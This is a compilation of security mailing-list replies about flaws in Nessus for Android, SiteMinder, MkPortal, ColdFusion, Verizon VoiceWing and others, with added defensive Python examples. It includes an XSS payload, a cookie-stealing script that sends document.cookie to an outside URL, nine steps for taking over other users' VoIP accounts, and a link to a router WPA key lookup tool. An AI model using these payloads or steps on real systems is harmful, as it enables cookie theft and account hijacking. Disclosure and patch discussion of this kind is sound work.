NESSUS ANDROID APP - stores login info in plain text
Nessus app for Android, version 1.0.1. The app allows the user to save Nessus server info (IP/username/password). The app saves this info to /sdcard/servers.id. This file can be viewed with Notepad and the password is right there in plain text. This means any app on the system can see that info and possibly transmit it to an attacker.
Re: Default key algorithm in Thomson and BT Home Hub routers
I've created an online lookup (no brute force) tool that lets you retrieve the WPA keys for speedtouch modems: http://www.nickkusters.com/articles/79/Online_SpeedTouch_WPA_Key_Lookup.aspx
Re: Lifetype 1.2.7 XSS Vulnerability
Fixed in 1.2.8. Trivial issue, right, and hardly worth reporting, or is there a more significant issue that I am missing?
Re: Re: heanet.dl.sourceforge.net hacked?
The problem is: md5sums and sizes on http://www.libpng.org/pub/png/libpng.html do not match the sourceforge mirrors, ftp.simplesystems.org, etc.
libpng.org: 641193 bytes for libpng-1.2.27.tar.bz2
ftp.simplesystems.org and sourceforge: 804821 bytes
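The check that the post is doing by hand, as an added example (not code from the post or from libpng): compare a downloaded artifact's byte count and digests against the values the project's own page publishes, and refuse to unpack anything that deviates. The reference values and mirror contents below are constructed for a three-byte stand-in file, not libpng's real numbers.

```python
import hashlib
import hmac

# Trusted reference, as a project page like libpng.org publishes it: the
# expected byte count and digests. Values below are CONSTRUCTED for a tiny
# stand-in artifact (the bytes b"abc"), not libpng's real numbers.
TRUSTED_REFERENCE = {
    "size": 3,
    "digests": {
        "md5": "900150983cd24fb0d6963f7d28e17f72",
        "sha256": "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad",
    },
}

# Constructed stand-ins for the same file as served by three mirrors.
# "mirror-b" serves a larger file, which is the symptom described above.
MIRROR_COPIES = {
    "primary": b"abc",
    "mirror-a": b"abc",
    "mirror-b": b"abc\x00padding",
}


def verify_download(data: bytes, reference: dict) -> list:
    """Compare a downloaded artifact against its trusted reference.

    Returns an empty list when the bytes are acceptable, otherwise one
    human-readable problem per failed check. Size is checked first because
    it is the cheapest signal; every listed digest is then checked so a
    mismatch in any one of them fails the artifact.
    """
    problems = []
    if len(data) != reference["size"]:
        problems.append(f"size mismatch: got {len(data)}, expected {reference['size']}")
    for algo, expected in reference["digests"].items():
        actual = hashlib.new(algo, data).hexdigest()
        # constant-time compare is harmless here and a good habit for digests
        if not hmac.compare_digest(actual, expected):
            problems.append(f"{algo} mismatch: got {actual}, expected {expected}")
    return problems


def check_mirrors(reference: dict, copies: dict) -> dict:
    """Map each mirror name to its problems, omitting mirrors that verify clean."""
    report = {}
    for name, data in copies.items():
        problems = verify_download(data, reference)
        if problems:
            report[name] = problems
    return report


if __name__ == "__main__":
    bad = check_mirrors(TRUSTED_REFERENCE, MIRROR_COPIES)
    for name, problems in bad.items():
        print(f"{name}: do not unpack")
        for p in problems:
            print(f"  - {p}")
    if not bad:
        print("all mirrors match the trusted reference")
```

The size check alone already flags the mirror in the post (641193 vs 804821 bytes). MD5 is included because that is what the libpng page published; since MD5 collisions are cheap, a stronger digest or a detached signature from the project is what the reference should carry, and the function checks every digest the reference lists so a single weak one is never the only gate.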
Re: PR07-38: XSS on sIFR
Unfortunately there's a bit of confusion, as Mike Davidson of mikeindustries.com is no longer the maintainer of sIFR, and he has not updated the sIFR page in a while. This issue was found and resolved on July 4th 2007, in version 2.0.3. It also appears that Internet Explorer is not vulnerable to this attack. More about 2.0.3 and the XSS issue here: http://novemberborn.net/sifr/2.0.3
Re: Simple Machine Forum - Private section/posts/info disclosure
This is the second SMF vulnerability announced in recent weeks that appears to be caused by administrative misconfiguration rather than an error in SMF. I have tested this on a default SMF 1.1.4 test environment and it did not work for me. Given the fact that previous messages from h3llcode or others in your blackroots.it group make mention of the use of .htaccess for controlling access to sensitive areas, it seems likely that h3llcode has opened permissions to allow escalated privileges to others and is then attempting to control those privileges using .htaccess files. Either that or h3llcode is testing the advanced search from an account enabled with escalated privileges already. h3llcode, please create a default SMF 1.1.4 test environment and report back on your findings. If it can be duplicated in a properly configured SMF forum, I'm very interested in knowing about it. Thank you, Kevin Lynn, CISSP
Re: SiteMinder Agent: Cross Site Scripting
Would you explain in detail how this is a successful exploit? I ran https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 against the current 6.0.5.11 SiteMinder Web Agent. This attempt is stopped with the following two errors in the Web Agent log.
1. Error. No redirect target found in namespace.
2. unable to process FCC parameters. Returning SmNoAction.
SiteMinder only causes a redirect to smpwservices.fcc on certain conditions, it's not accessed directly, and it would not generate a URL with a query string that only includes SMAUTHREASON=. Or are you attempting to replace SMAUTHREASON= with SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 in the query string during the normal process with something like Burp proxy? I tested that as well, and the inserted code was ignored and didn't persist to the next step during the process.
Re: "BIND 9 DNS Cache Poisoning" by Amit Klein (Trusteer)
I don't exactly see how this is new "News" since Zalewski's paper on TCP sequence number analysis (which included analysis of versions of BIND): http://lcamtuf.coredump.cx/newtcp/ -ntn
Re: MkPortal Urlobox Cross Site Request Forgery
This is a bogus report. Only Administrators have perms to post URLs in the Urlobox. I think we can safely assume that an Admin is not going to hack his own website. -=DKC=- mkportal.it
Re: MkPortal Urlobox Cross Site Request Forgery
I was wrong about this issue in my previous post.
Unofficial Solution:
FIND in /mkportal/modules/urlobox/index.php:
$message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/',$no_url,$message);
$message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/',$no_img,$message);
REPLACE WITH:
$message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message);
$message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message);
-=DKC=-
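Why the /i modifier matters, as an added example that is not MkPortal's code or the poster's: the two preg_replace patterns above transcribed to Python, once case-sensitive as originally shipped and once with re.IGNORECASE as in the fix, run over the same tag written in three casings, plus a regression check that scans the filtered output for any URL/IMG tag that survived. The placeholder strings NO_URL and NO_IMG stand in for MkPortal's $no_url and $no_img (assumed names), and the sample messages are constructed.

```python
import re

# Placeholders standing in for MkPortal's $no_url / $no_img strings (assumed
# names; the real values are whatever the admin configured). Chosen so they do
# not themselves look like BBCode tags.
NO_URL = "(link removed)"
NO_IMG = "(image removed)"

# The two patterns from the post, transcribed from PCRE to Python re.
URL_PATTERN = r"\[URL=(.+?)\](.+)\[/URL\]"
IMG_PATTERN = r"\[IMG\](.+?)\[/IMG\]"


def strip_bbcode_case_sensitive(message: str) -> str:
    """The pre-fix behaviour: only upper-case tags are matched."""
    message = re.sub(URL_PATTERN, NO_URL, message)
    message = re.sub(IMG_PATTERN, NO_IMG, message)
    return message


def strip_bbcode_fixed(message: str) -> str:
    """The post's fix: the PCRE /i modifier becomes re.IGNORECASE."""
    message = re.sub(URL_PATTERN, NO_URL, message, flags=re.IGNORECASE)
    message = re.sub(IMG_PATTERN, NO_IMG, message, flags=re.IGNORECASE)
    return message


# Regression scanner: any opening or closing URL/IMG tag, in any case.
TAG_SCAN = re.compile(r"\[/?(?:URL|IMG)\b[^\]]*\]", re.IGNORECASE)


def remaining_tags(message: str) -> list:
    """Return every URL/IMG tag that survived filtering; empty means clean."""
    return TAG_SCAN.findall(message)


# Constructed test messages: the same post written in three casings.
SAMPLES = [
    "[URL=http://example.invalid/]click[/URL]",
    "[url=http://example.invalid/]click[/url]",
    "[Img]http://example.invalid/pic.png[/iMG]",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        before = strip_bbcode_case_sensitive(sample)
        after = strip_bbcode_fixed(sample)
        print(f"{sample!r}")
        print(f"  case-sensitive -> {before!r} leftover={remaining_tags(before)}")
        print(f"  fixed          -> {after!r} leftover={remaining_tags(after)}")
```

The scanner is the useful part for a maintainer: run it over the filter's output for every casing a user can type and the filter fails the test the moment a tag survives. The greedy (.+) in the URL pattern is kept as in the original, so a line holding two URL tags collapses into a single placeholder, which is the original behaviour and not part of the fix.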
Re: Re: Apple Remote Desktop root vulnerability
This is not so much a vulnerability as an oversight. Whose oversight is up to you, but if you run a process remotely as root, and it has a GUI, then the GUI will appear on the screen, as a root process. This usually involves a menubar, and thereby access to System Preferences. An easy demonstration is using SSH to log into a box, sudo -s to get a root shell, and execute ANY program in the Applications directory (open -a Safari). You'll get Safari and access to the menubar with the login window appearing as a hindrance. This isn't anything new; the guys using RADMIND have been fighting it since 10.4 came out and redid the way the system handles the login window at startup. On the automated side, applications like iHook have created a very nice workaround for this. At the ARD end, the lock screen function does this well enough. It's merely a matter of testing deployment on a machine you have physical access to before shoving it down to x-number of computers. This is something John Welch (bynkii.com) harped about this spring. It's shoddy design on the part of many app designers, not giving a proper remote installer or pkg file that can execute silently. Whether or not this is something Apple needs to fix, that's up for debate. They are not necessarily in the wrong here, regardless of how much it may appear to be an obvious security flaw. Maybe they should check to see if the LoginWindow is displayed before allowing a GUI app to run with root privileges, but after debating this issue enough I've come to the conclusion that Apple, the programmers, and the administrators are all at fault at some level.
Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability
I made this script a long time ago and actually I don't use it anymore (I use a newer version which is not ready for "the real world" yet). By accident I discovered this page when I showed someone how many hits you will get when you google your own name. You say "Vendor Contacted, But No Response", but I haven't seen a mail about this, or it was disguised as spam, and I removed it. But I made a quick update (removed the language option) and placed it on my site (http://matthijs.draijer.org/download.php?id=35)
Re: Photocycle v1.0 - XSS
Patched within a couple hours of discovery. Download version 1.1 from the Photocycle homepage: http://adambrown.info/p/tools/photocycle
Verizon Voicewing and Linksys PAP2-VN
Product: Verizon Voicewing combined with Linksys PAP2-VN
Reported by: Haavar Valeur
Status: Vendor unwilling to address the problem
Reported: Mar 15, 2006

I found a way it is possible to make and receive calls from other Verizon accounts. The problem is that Verizon publishes encrypted configuration files containing the username and password. These files are published through TFTP and HTTP, and are publicly readable. A vulnerability is created because the PAP2-VN adapter trusts the web server to give it the correct file. The PAP2 adapter accepts and decrypts configuration files for other accounts if they are available at the URI where the adapter expects to find its configuration file. The following steps can be taken by anyone with a PAP2-VN adapter to access random users' accounts:
1) Create a subnet that you are able to isolate from the internet
2) Block all TFTP access from the subnet to the Internet. This will make the adapter failover to HTTP (I did not bother to set up a TFTP server).
3) Redirect all HTTP requests made from the subnet to a web server you control (possible with e.g. iptables)
4) Connect the PAP2 adapter to the subnet and wait for the adapter to try to get the config file.
5) Look in the web server access log or tcpdump to find what URL the PAP2 tries to access on the web server
6) The URL should contain the MAC address of the PAP2. Try finding another valid MAC by changing one of the least significant digits, and download the file from Verizon's web server.
7) Rename the file you downloaded to the filename the PAP2 tried to access and put it on the web server so the PAP2 will download this file.
8) The PAP2 will download and decrypt this file containing the account information of the other user and connect to the SIP server.
9) Now you can make and receive calls from another account
This has been tested on a PAP2-VN with firmware v2.0.10 and Verizon Voicewing, but could apply to other vendors using this adapter.
Re: Cross-site scripting vulnerability in CF 5.0
Something to note: the 'view admin log' feature in CF tends to cause stress on the CF process, and also blocks the log file during opening. So it's generally better (and safer, with this cross-site scripting problem that's been around for years) to view the log files via a text viewer on the system. By default, they're in c:\cfusion\log\*.log

On Mon, 16 Dec 2002, KiLL CoLe wrote:
> Cross-site scripting vulnerability in CF 5.0. This issue was brought up to Macromedia on July 22nd, 2002. Macromedia issued a fix to me, but I have not seen the fix available to the public. The ColdFusion administrator allows you to view your application log via your web browser. Under certain conditions, it is possible to remotely alter ColdFusion's application log. Take the following code:
>
> SELECT * FROM Products
> Where ProductId = #int(url.productid)#
>
> If the INT function encounters a value that is not numeric, it throws an exception and writes the value that was passed to application.log. Should an unsuspecting administrator view the log file via their web browser, script could be executed. Analyze this code: if url.productid (from the above example) were passed in as:
>
> document.frame1.location="http://www.domain.com/index.cfm?stealcookie=" + document.cookie
>
> this would enable an attacker to steal the value of the ColdFusion administrator's cookie. Decrypting the ColdFusion admin's password is well documented, and exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw exceptions similar to the INT function.
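The two places this class of bug is fixed, as an added example that is not ColdFusion's code or either poster's: a log viewer that drops log text into the page as-is (the flaw described above) beside one that HTML-escapes every line, plus a writer-side sanitizer that strips control characters and caps length so an untrusted request value cannot forge extra log lines. The application.log lines are constructed in the shape the quoted post describes, with a generic harmless script tag as the injected value.

```python
import html
import re

# Constructed application.log lines in the shape the post describes: the
# ColdFusion int() exception writes the offending request value verbatim.
# The script tag is a generic, harmless test payload.
LOG_LINES = [
    '"Error","jrpp-1","12/16/02","10:15:02","Invalid parameter type. The value "abc" cannot be converted to a number."',
    '"Error","jrpp-2","12/16/02","10:15:09","Invalid parameter type. The value "<script>alert(1)</script>" cannot be converted to a number."',
]


def render_log_unsafe(lines: list) -> str:
    """Mirrors the flaw: log text is dropped into the page as-is."""
    return "<pre>\n" + "\n".join(lines) + "\n</pre>"


def render_log_escaped(lines: list) -> str:
    """Fix at the viewer: every log byte is treated as data, never as markup."""
    return "<pre>\n" + "\n".join(html.escape(line, quote=True) for line in lines) + "\n</pre>"


# ASCII control characters, including CR/LF, which would let one request
# value span several log lines or overwrite the terminal view.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_for_log(value: str, max_len: int = 200) -> str:
    """Defence at the writer: neutralise control characters and cap length.

    Markup is deliberately left alone here; escaping is the viewer's job,
    because the same log is also read by plain-text tools and the escaping
    must match the output context.
    """
    cleaned = CONTROL_CHARS.sub(" ", value)
    return cleaned[:max_len]


def has_live_markup(rendered: str) -> bool:
    """Regression check for a viewer: does its output contain a raw <script> tag?"""
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, renderer in (("unsafe", render_log_unsafe), ("escaped", render_log_escaped)):
        page = renderer(LOG_LINES)
        print(f"{name}: live script tag present = {has_live_markup(page)}")
    print(repr(sanitize_for_log("abc\r\nforged line")))
```

The viewer-side escape is the one that closes the reported hole, since the log already contains attacker-chosen text; the writer-side sanitizer is the cheap complement that keeps a single request from fabricating whole log entries, which matters for any tool that later parses the file line by line.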
Re: ZoneEdit Account Hijack Vulnerability
In-Reply-To: <000701c284d5$ccf1e2e0$[EMAIL PROTECTED]>

> The webmasters of this site were informed of this vulnerability on 05 November 2002. To date, no usable information on protecting against this vulnerability has been received.

Matt and Paul were contacted on 05 November 2002 to notify them that a security review had been completed, and to please re-run their tests. No reply has yet been received.
Erik Aronesty
ZoneEdit CEO